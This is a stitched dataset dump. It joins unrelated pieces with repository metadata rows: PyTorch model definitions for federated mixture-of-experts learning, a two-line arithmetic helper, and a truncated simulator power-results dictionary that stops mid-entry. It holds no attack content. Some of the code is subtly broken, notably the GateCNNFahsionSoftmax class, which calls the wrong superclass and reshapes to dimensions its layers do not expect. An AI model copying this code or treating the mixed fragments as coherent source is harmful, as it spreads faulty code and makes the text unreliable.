| 49.026929 | 312 | 0.652703 | 9,690 | 67,363 | 4.490093 | 0.066976 | 0.029649 | 0.036682 | 0.035717 | 0.835321 | 0.809924 | 0.785539 | 0.752764 | 0.723597 | 0.690524 | 0 | 0.025506 | 0.195077 | 67,363 | 1,373 | 313 | 49.062637 | 0.776788 | 0.033728 | 0 | 0.613636 | 0 | 0.003953 | 0.115069 | 0.010416 | 0.000988 | 0 | 0 | 0 | 0 | 0 | null | null | 0.023715 | 0.01581 | null | null | 0.000988 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0954b2930223e5bea1d1a7c5e2cff0e462893616 | 10,014 | py | Python | models/Models.py | martisak/federated-learning-mixture | 091e72f9a9fe9a7ab534dacabc45e0eecd8b3f0e | [
"MIT"
] | null | null | null | models/Models.py | martisak/federated-learning-mixture | 091e72f9a9fe9a7ab534dacabc45e0eecd8b3f0e | [
"MIT"
] | null | null | null | models/Models.py | martisak/federated-learning-mixture | 091e72f9a9fe9a7ab534dacabc45e0eecd8b3f0e | [
"MIT"
] | null | null | null | import torch
from torch import nn
import torch.nn.functional as F
class MyEnsemble(nn.Module):
def __init__(self, modelA, modelB):
super().__init__()
self.modelA = modelA
self.modelB = modelB
# self.classifier = nn.Linear(noClasses * 2, noClasses)
self.activation = nn.LogSoftmax()
def forward(self, x):
with torch.no_grad():
x1, _ = self.modelA(x)
x2, _ = self.modelB(x)
#x = torch.cat((x1, x2), dim=1)
#x = self.classifier(F.relu(x))
out = self.activation(x1 + x2)
return 0, out
class MLP(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(MLP, self).__init__()
self.layer_input = nn.Linear(dim_in, dim_hidden)
self.relu = nn.ReLU()
self.dropout = nn.Dropout()
self.layer_hidden = nn.Linear(dim_hidden, dim_out)
self.activation = nn.LogSoftmax()
def forward(self, x):
x = x.view(-1, x.shape[1] * x.shape[-2] * x.shape[-1])
x = self.layer_input(x)
x = self.dropout(x)
x = self.relu(x)
x = self.layer_hidden(x)
x = self.activation(x)
return x
class MLP2(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(MLP2, self).__init__()
self.layer_input = nn.Linear(dim_in, dim_hidden)
self.relu = nn.ReLU()
self.dropout = nn.Dropout()
self.layer_hidden = nn.Linear(dim_hidden, dim_out)
self.activation = nn.LogSoftmax()
def forward(self, x):
x = self.layer_input(x)
x = self.dropout(x)
x = self.relu(x)
x = self.layer_hidden(x)
x = self.activation(x)
return x
class GateMLP(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(GateMLP, self).__init__()
self.layer_input = nn.Linear(dim_in, dim_hidden)
self.relu = nn.ReLU()
self.dropout = nn.Dropout()
self.layer_hidden = nn.Linear(dim_hidden, dim_out)
self.activation = nn.Sigmoid()
def forward(self, x):
x = x.view(-1, x.shape[1] * x.shape[-2] * x.shape[-1])
x = self.layer_input(x)
x = self.dropout(x)
x = self.relu(x)
x = self.layer_hidden(x)
x = self.activation(x)
return x
class CNNLeafFEMNIST(nn.Module):
"""
Model from LEAF paper, but with dropout
TODO: Implicit dimension choice for log_softmax has been deprecated
"""
def __init__(self, args):
super().__init__()
self.conv1 = nn.Conv2d(1, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 4 * 4, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, args.num_classes)
self.activation = nn.LogSoftmax()
def forward(self, x):
"""
Forward pass
"""
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
out2 = self.activation(out1)
return out1, out2
class GateCNNLeaf(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 5 * 5, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.activation(x)
return x
class GateCNNFEMNIST(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 4 * 4, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.activation(x)
return x
class CNNLeaf(nn.Module):
"""
Model from LEAF paper, but with dropout
TODO: Implicit dimension choice for log_softmax has been deprecated
"""
def __init__(self, args):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 5 * 5, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, args.num_classes)
self.activation = nn.LogSoftmax()
def forward(self, x):
"""
Forward pass
"""
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
out2 = self.activation(out1)
return out1, out2
class CNNCifar(nn.Module):
def __init__(self, args):
super(CNNCifar, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.conv2_drop = nn.Dropout2d(p=0.5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, args.num_classes)
self.activation = nn.LogSoftmax()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
x = self.fc3(out1)
out2 = self.activation(x)
return out1, out2
class GateCNN(nn.Module):
def __init__(self, args):
super(GateCNN, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
#self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
class GateCNNSoftmax(nn.Module):
def __init__(self, args):
super(GateCNNSoftmax, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 3)
self.activation = nn.Softmax()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
class CNNFashion(nn.Module):
def __init__(self, args):
super(CNNFashion, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 12, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(12 * 4 * 4, 84)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(84, 42)
self.fc3 = nn.Linear(42, args.num_classes)
self.activation = nn.LogSoftmax()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 12 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
x = self.fc3(out1)
out2 = self.activation(x)
return out1, out2
class GateCNNFashion(nn.Module):
def __init__(self, args):
super(GateCNNFashion, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 12, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(12 * 4 * 4, 84)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(84, 42)
self.fc3 = nn.Linear(42, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 12 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
class GateCNNFahsionSoftmax(nn.Module):
def __init__(self, args):
super(GateCNNSoftmax, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 12, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(12 * 4 * 4, 84)
self.fc2 = nn.Linear(84, 42)
self.fc3 = nn.Linear(42, 3)
self.activation = nn.Softmax()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
| 29.452941 | 71 | 0.541342 | 1,475 | 10,014 | 3.56678 | 0.067797 | 0.031173 | 0.058164 | 0.038016 | 0.911234 | 0.907432 | 0.907432 | 0.886143 | 0.87835 | 0.87702 | 0 | 0.064224 | 0.304973 | 10,014 | 339 | 72 | 29.539823 | 0.691667 | 0.038746 | 0 | 0.85283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0059 | 0 | 1 | 0.10566 | false | 0 | 0.011321 | 0 | 0.222642 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1189e5034d6da727ab4384f637a4a65fae7f652c | 40 | py | Python | W7/D2/func_area.py | Nasfame/Assignments-Masai | 0dc95c3fb58849637a7aad4914b92970c9196eca | [
"MIT"
] | 1 | 2020-05-29T09:00:44.000Z | 2020-05-29T09:00:44.000Z | W7/D2/func_area.py | Nasfame/Assignments-Masai | 0dc95c3fb58849637a7aad4914b92970c9196eca | [
"MIT"
] | null | null | null | W7/D2/func_area.py | Nasfame/Assignments-Masai | 0dc95c3fb58849637a7aad4914b92970c9196eca | [
"MIT"
] | null | null | null | def ar(n1,n2):
return n1*n2,n1+n2,
| 10 | 23 | 0.575 | 9 | 40 | 2.555556 | 0.555556 | 0.521739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 0.225 | 40 | 3 | 24 | 13.333333 | 0.548387 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
eec938fdd2ca5f629bd8a693db1138695c7c6228 | 68,611 | py | Python | benchmarks/SimResults/micro_pinned_train_combos/cmpB_soplexmcfcalculixgcc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/micro_pinned_train_combos/cmpB_soplexmcfcalculixgcc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/micro_pinned_train_combos/cmpB_soplexmcfcalculixgcc/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 5.66814e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.357856,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.619677,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.355402,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.33293,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.353722,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.57023,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 3.82383e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0129726,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0938103,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.09594,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0938142,
'Execution Unit/Register Files/Runtime Dynamic': 0.108913,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.226686,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.582618,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.63254,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00404391,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00404391,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00354112,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00138115,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00137819,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0130071,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0380981,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0922296,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.86659,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.347548,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.313253,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.37418,
'Instruction Fetch Unit/Runtime Dynamic': 0.804136,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0708991,
'L2/Runtime Dynamic': 0.0156825,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.03428,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.36645,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0904947,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0904948,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.46335,
'Load Store Unit/Runtime Dynamic': 1.90323,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.223144,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.446289,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0791947,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0799696,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.364763,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0578344,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.660174,
'Memory Management Unit/Runtime Dynamic': 0.137804,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.7005,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.3648e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0182989,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.185277,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.20359,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.69698,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
